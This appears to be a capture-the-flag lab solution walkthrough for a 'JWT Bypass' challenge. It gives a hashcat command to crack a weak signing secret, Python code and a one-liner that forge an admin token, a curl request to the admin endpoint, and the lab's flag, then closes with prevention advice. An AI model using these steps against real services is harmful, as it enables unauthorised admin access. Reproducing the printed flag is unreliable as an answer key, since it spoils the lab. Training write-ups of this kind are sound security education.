Lab Icon

JWT Bypass

Challenge 25 Jul 2025 Pro Exclusive Solution Available

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

1
Flags
5
Points
50%
Success Rate
Start Your Challenge
~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Challenge

JWT Bypass - Complete Solution Walkthrough

Step 1: Understanding the Challenge

The challenge presents a JWT-based authentication system. You need to analyze the JWT tokens and find a way to forge an admin token to access the admin panel.

Step 2: Initial Reconnaissance

  1. Access the JWT authentication system (you'll be automatically redirected from port 80 to the application)
  2. Login with the provided demo credentials:
    • Username: user
    • Password: password123
  3. This will give you a valid JWT token to analyze

Step 3: JWT Token Analysis

  1. Once you receive the JWT token, analyze it using tools like:
    • jwt.io - For decoding and analyzing JWT structure
    • hashcat - For cracking weak JWT secrets
    • john the ripper - Alternative for JWT secret cracking
  2. Examine the JWT structure: header.payload.signature

Step 4: Identifying the Vulnerability

  1. The JWT token uses a weak secret that can be cracked
  2. Use hashcat to crack the secret:
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt
  1. Or try a dictionary attack with common secrets
  2. The secret is: secret123

Step 5: Forging an Admin Token

  1. Once you have the secret, forge a new JWT token with admin privileges
  2. Using Python to create the admin token:
#!/usr/bin/env python3
import jwt
import datetime

# If you get AttributeError, try: pip install PyJWT
payload = {
    'username': 'admin',
    'role': 'admin',
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}

secret = 'secret123'
admin_token = jwt.encode(payload, secret, algorithm='HS256')
print(admin_token)
  1. If you get an AttributeError, ensure you have the correct library:
pip install PyJWT
  1. Alternative approach using command line with a working Python environment:
python3 -c "import jwt, datetime; print(jwt.encode({'username': 'admin', 'role': 'admin', 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)}, 'secret123', algorithm='HS256'))"
  1. Alternatively, use jwt.io with the secret to forge the token

Step 6: Accessing the Admin Panel

  1. Use the forged admin token to access the admin endpoint:
curl -H "Authorization: Bearer <admin_token>" <target-ip>:8080/admin
  1. The admin endpoint will return the flag in JSON format

Step 7: Retrieving the Flag

  1. The admin endpoint response contains the flag:
538955b8-96c1-4905-a305-8cc385de622c

Security Implications and Prevention

  • Weak Secrets: Never use predictable or dictionary-based secrets for JWT signing
  • Secret Management: Implement proper secret rotation and secure storage
  • Algorithm Verification: Always verify the algorithm used in JWT tokens
  • Server-side Validation: Implement robust JWT validation on the server side
  • Consider RS256: Use asymmetric algorithms for better security in production